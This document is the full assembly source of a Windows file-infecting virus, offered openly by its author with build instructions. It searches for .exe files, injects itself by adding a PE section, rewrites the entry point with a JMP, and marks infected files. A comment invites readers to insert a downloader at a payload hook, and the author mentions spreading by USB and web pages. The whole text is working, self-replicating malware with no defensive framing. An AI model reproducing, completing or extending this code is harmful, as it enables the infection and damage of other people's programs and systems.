; First of all i must be sorry for my bad english ; This is a simple virus and you can modify what you want ; In fact the following code just a part of my virus ,because of it's spreading. ; That, i add code which could spread via USB Disk, WebPage. ; OK, now i wish you could enjoy my code,thank you ; ;ml /c /Cp /coff virus.asm ;link /subsystem:windows /section:.text,wre virus ; ; ; , / \'''```` ; , | | ,,_ ' .. ; | | | /`` \ \ / ; \ / / / | \ ` ; | / / ,-`\ ' _. ` | ; \ / |-` | `` | ; , | / \ , ; | | | | | ; \ | | \ | ; \| | `'''''' | ; | | ; | \ ; \ ; Group/Team : W.S.T ; WebSite : http://www.wolvez.org/Forum ; Welcome to W.S.T ^-^ .586p .model flat, stdcall .CODE VirusMain: VirusStart: call GetDeltaPointer GetDeltaPointer: mov ebp,dword ptr [esp] add esp,4 sub ebp, offset GetDeltaPointer GetKernelBase: mov eax,[esp] and eax,0ffff0000h check: cmp word ptr [eax],5A4Dh; jz checkpe sub eax,10000h jmp check ; checkpe: mov [ebp+Kernel32Address],eax add eax,[eax+3ch]; cmp word ptr [eax],4550h jnz error_Final jmp Begin APIS: szCloseHandle db 'CloseHandle',0 _CloseHandle dd 0 szCreateFileA db 'CreateFileA',0 _CreateFileA dd 0 szCreateFileMappingA db 'CreateFileMappingA',0 _CreateFileMappingA dd 0 szSetFileAttributesA db 'SetFileAttributesA',0 _SetFileAttributesA dd 0 szMapViewOfFile db 'MapViewOfFile',0 _MapViewOfFile dd 0 szSetEndOfFile db 'SetEndOfFile',0 _SetEndOfFile dd 0 szSetFilePointer db 'SetFilePointer',0 _SetFilePointer dd 0 szUnmapViewOfFile db 'UnmapViewOfFile',0 _UnmapViewOfFile dd 0 szExitProcess db 'ExitProcess',0 _ExitProcess dd 0 szGetFileSize db 'GetFileSize',0 _GetFileSize dd 0 szGetModuleHandle db 'GetModuleHandle',0 _GetModuleHandle dd 0 szFindClose db 'FindClose',0 _FindClose dd 0 szFindFirstFileA db 'FindFirstFileA',0 _FindFirstFileA dd 0 szFindNextFileA db 'FindNextFileA',0 _FindNextFileA dd 0 szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0 _SetCurrentDirectoryA dd 0 szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0 _GetCurrentDirectoryA dd 0 DATAS: WriteAddr dd 0 Fir_Sec_Addr dd 0 Cur_Sec_Addr dd 0 SetJmpOepsize dd (offset SetJmpOepEnd - offset SetJmpOep) ;hehe a joke Now_Sec_Addr dd 0 OepData dd 0 WIN32_FIND_DATA STRUC FileAttributes dd 0 CreateTime dq 0 LastAccessTime dq 0 LastWriteTime dq 0 FileSizeHigh dd 0 FileSizeLow dd 0 Reserved0 dd 0 Reserved1 dd 0 FullFileName db 260 dup(0) AlternateFileName db 14 dup(0) WIN32_FIND_DATA ENDS win32_find_data WIN32_FIND_DATA <> Kernel32Address DD 0 AppStart dd 0 Vlen dd (offset VirusEnd- offset VirusStart) ImageBase dd 0 HFcreatefilemapping dd 0 HFmapviewoffile dd 0 sec_align dd 0 file_align dd 0 oldEnd dd 0 oldEip dd 0 NewIp dd 0 PE_Head dd 0 FileHandle dd 0 InfectNumber dd 0 HFileFind dd 0 SearchString db '*.exe',0 Begin: GetAPIAddr: lea esi,[ebp+szSetFileAttributesA] call GetFunctionAddress mov [ebp+_SetFileAttributesA],eax lea esi,[ebp+szCloseHandle] call GetFunctionAddress mov [ebp+_CloseHandle],eax lea esi,[ebp+szCreateFileA] call GetFunctionAddress mov [ebp+_CreateFileA],eax lea esi,[ebp+szCreateFileMappingA]; call GetFunctionAddress mov [ebp+_CreateFileMappingA],eax lea esi,[ebp+szMapViewOfFile] call GetFunctionAddress mov [ebp+_MapViewOfFile],eax lea esi,[ebp+szSetEndOfFile] call GetFunctionAddress mov [ebp+_SetEndOfFile],eax lea esi,[ebp+szSetFilePointer] call GetFunctionAddress mov [ebp+_SetFilePointer],eax lea esi,[ebp+szUnmapViewOfFile] call GetFunctionAddress mov [ebp+_UnmapViewOfFile],eax lea esi,[ebp+szExitProcess] call GetFunctionAddress mov [ebp+_ExitProcess],eax lea esi, [ebp+szFindFirstFileA] call GetFunctionAddress mov [ebp+_FindFirstFileA], eax lea esi, [ebp+szFindNextFileA] call GetFunctionAddress mov [ebp+_FindNextFileA], eax lea esi,[ebp+szFindClose] call GetFunctionAddress mov [ebp+_FindClose],eax lea esi,[ebp+szGetFileSize]; call GetFunctionAddress mov [ebp+_GetFileSize],eax lea esi,[ebp+szGetModuleHandle] call GetFunctionAddress mov [ebp+_GetModuleHandle],eax @Next: push 0 call [ebp+_GetModuleHandle] test eax,eax jz error_Final add eax,[eax+3ch] cmp dword ptr [eax+08h],'vfer' jz GoToWork mov dword ptr [ebp+InfectNumber],20 call SearchFiles; jmp @Exit InfectFiles: lea esi,[ebp+win32_find_data.FullFileName]; push 80H push esi call [ebp+_SetFileAttributesA] call OpenFile mov [ebp+FileHandle],eax inc eax test eax,eax jz error_Final mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow] add ecx,01000h push ecx call CreateMap test eax,eax jz error_CreateMap mov [ebp+HFcreatefilemapping],eax; pop ecx call MapFile test eax,eax jz error_MapFile mov [ebp+HFmapviewoffile],eax Injection: xchg esi,eax cmp word ptr [esi],5A4Dh; jnz error_MapFile add esi,[esi+3ch]; cmp word ptr [esi],4550h jnz error_MapFile cmp dword ptr [esi+08h],'vfer' jz @Close ;has been infect mov [ebp+PE_Head],esi push 0h pop dword ptr [esi+0d0h] push 0h pop dword ptr[esi+0d4h] mov ebx, dword ptr[esi+38h] mov [ebp+sec_align],ebx mov edi,dword ptr [esi+3ch] mov [ebp+file_align],edi mov ebx,dword ptr [esi+28h] add ebx,[esi+34h] mov [ebp+oldEip],ebx movzx ebx,word ptr [esi+14h]; lea eax,[esi+ebx+18h]; xchg esi,eax mov dword ptr [ebp+Fir_Sec_Addr],esi ;**************************************************************************************************************************** ;First i check if program had been packed ;******************************************************************************************************************************* RandNum: RDTSC; and eax,00000002h; xchg eax,ecx imul ecx,ecx,28h; add esi,ecx;; mov dword ptr [ebp+Cur_Sec_Addr],esi mov ebx,dword ptr [esi+08h]; mov edx,dword ptr [esi+0ch]; add edx,ebx mov dword ptr [ebp+OepData],edx; mov edx,dword ptr [esi+10h]; sub edx,dword ptr [esi+08h]; js error_MapFile ; mov edi,dword ptr [esi+14h]; add edi,dword ptr [esi+08h] add edi,dword ptr [ebp+HFmapviewoffile]; sub edx,5 RandData: push edx RDTSC pop edx AND eax,edx test eax,eax jz RandData mov edx,dword ptr [ebp+OepData] add edx,eax mov dword ptr[ebp+OepData],edx add edi,eax mov dword ptr [ebp+WriteAddr],edi cmp dword ptr [edi],00000000h jnz error_MapFile ;*********************************************************** ; ok if the program hadnt packed i append a section ;************************************************************** mov esi,dword ptr [PE_Head] movzx ecx,word ptr[esi+06h] ; inc word ptr [esi+06h] imul ecx,ecx,28h ; mov esi,dword ptr [ebp+Fir_Sec_Addr] add esi,ecx mov dword ptr [ebp+Now_Sec_Addr],esi mov dword ptr[esi],' ' mov ebx,dword ptr[ebp+Vlen] mov dword ptr [esi+08h],ebx mov dword ptr [esi+24h],0e0000020h mov eax,dword ptr [esi-28h+08h] ; mov ebx,dword ptr[ebp+sec_align] cmp eax,ebx xor ecx,ecx jb @1 @@@@1: push eax sub eax,ebx js @@@@2 inc ecx pop eax sub eax,dword ptr [ebp+sec_align] jmp @@@@1 @@@@2: pop eax inc ecx mov eax,dword ptr [ebp+sec_align] mul ecx xchg eax,ebx @1: add ebx,dword ptr [esi-28h+0ch] mov dword ptr [esi+0ch],ebx @@1: mov dword ptr [ebp+NewIp],ebx mov eax,dword ptr [ebp+Vlen] mov ebx,dword ptr [ebp+file_align]; xor ecx,ecx cmp eax,ebx jb @2 @@@@3: push eax sub eax,ebx js @@@@4 inc ecx pop eax sub eax,dword ptr [ebp+file_align] jmp @@@@3 @@@@4: pop eax inc ecx mov eax,dword ptr [ebp+file_align] mul ecx xchg eax,ebx @2: mov dword ptr [esi+10h],ebx @@2: mov eax,dword ptr [esi-28h+14h] mov ebx,dword ptr [esi-28h+10h] add eax,ebx mov dword ptr [esi+14h],eax mov [ebp+oldEnd],eax ; ;****************************************************************************************************************************************************** ;Here i set "JMP xxxxxxxx" in the space where alway no data in it ; however, you also can set other data or code in it if the area have enough space ;****************************************************************************************************************************************************** RandSetData: mov edi,dword ptr [ebp+WriteAddr] ; haha a joke mov esi,offset SetJmpOep mov ecx,[ebp+SetJmpOepsize] cld rep movsb mov edx,dword ptr [ebp+OepData] add edx,5 mov esi,dword ptr [ebp+Now_Sec_Addr] mov ebx,dword ptr [esi+0ch] sub ebx,edx mov dword ptr [edi],ebx mov eax,dword ptr [ebp+PE_Head] mov ebx,dword ptr [ebp+OepData] mov dword ptr [eax+28h],ebx mov ebx,[eax+50h] add ebx,[ebp+Vlen] mov ecx,[ebp+sec_align] xor edx,edx xchg eax,ebx cdq div ecx test edx,edx je @@@4 inc eax @@@4: mul ecx xchg eax,ebx mov [eax+50h],ebx mov dword ptr [eax+8h],'vfer' cld mov ecx,[ebp+Vlen] mov edi,[ebp+oldEnd] add edi,[ebp+HFmapviewoffile] lea esi,[ebp+VirusStart] rep movsb xor eax,eax sub edi,[ebp+HFmapviewoffile] push 0h push 0h push edi push [ebp+FileHandle] call [ebp+_SetFilePointer] push [ebp+FileHandle] call [ebp+_SetEndOfFile] @Close: call UnMapFile call UnCreateMap call UnOpenFile ret ;*****************************************************THE END ******************************************************************************** GetFunctionAddress PROC mov eax, [ebp+Kernel32Address] ;EAX = Kernel32 Address mov ebx, [eax+3Ch] add ebx, eax add ebx, 120 mov ebx, [ebx] add ebx, eax ;EBX = Export Address xor edx, edx mov ecx, [ebx+32] add ecx, eax push esi push edx CompareNext: pop edx pop esi inc edx mov edi, [ecx] add edi, eax add ecx, 4 push esi push edx CompareName: mov dl, [edi] mov dh, [esi] cmp dl, dh jne CompareNext inc edi inc esi cmp byte ptr [esi], 0 je GetAddress jmp CompareName GetAddress: pop edx pop esi dec edx shl edx, 1 mov ecx, [ebx+36] add ecx, eax add ecx, edx xor edx, edx mov dx, [ecx] shl edx, 2 mov ecx, [ebx+28] add ecx, eax add ecx, edx add eax, [ecx] ret GetFunctionAddress ENDP MapFile proc xor eax,eax push ecx push eax push eax push 00000002h push dword ptr [ebp+HFcreatefilemapping] call [ebp+_MapViewOfFile] ret MapFile endp CreateMap proc xor eax,eax push eax push ecx push eax push 00000004h push eax push dword ptr [ebp+FileHandle] call [ebp+_CreateFileMappingA] ret CreateMap endp SearchFiles proc lea eax, [ebp+win32_find_data] lea ebx, [ebp+SearchString] push eax push ebx Call [ebp+_FindFirstFileA] inc eax jz SearchClose dec eax mov dword ptr [ebp+HFileFind],eax CompareFileSizeHigh: cmp [ebp+win32_find_data.FileSizeHigh],0 jne SearchNext call InfectFiles dec [ebp+InfectNumber] cmp [ebp+InfectNumber],0 je SearchHandleClose SearchNext: push ebp lea eax, [ebp+win32_find_data] push eax mov eax,dword ptr [ebp+HFileFind] push eax call [ebp+_FindNextFileA] pop ebp cmp eax,0 je SearchHandleClose jmp CompareFileSizeHigh SearchHandleClose: push ebp push dword ptr[ebp+HFileFind] call [ebp+_FindClose] pop ebp SearchClose: ret SearchFiles endp OpenFile proc xor eax,eax push eax push eax push 00000003h push eax inc eax push eax push 80000000h or 40000000h push esi call [ebp+_CreateFileA] ret OpenFile endp SetJmpOep: db 0E9h SetJmpOepEnd: UnMapFile proc push [ebp+HFmapviewoffile] call [ebp+_UnmapViewOfFile] ret UnMapFile endp UnCreateMap proc push [ebp+HFcreatefilemapping] call [ebp+_CloseHandle]; ret UnCreateMap endp UnOpenFile proc push [ebp+FileHandle] call [ebp+_CloseHandle] ret UnOpenFile endp GoToWork: ;***********************************************************************HERE*********************************************************************** ;you can add your own code ^-^ such as downloader or others ;*************************************************************************************************************************************************** mov eax,dword ptr[ebp+oldEip] jmp eax error_MapFile: call UnMapFile error_CreateMap: call UnCreateMap error_Final: call UnOpenFile ret @Exit: push 0h call [ebp+_ExitProcess]; VirusEnd: end VirusMain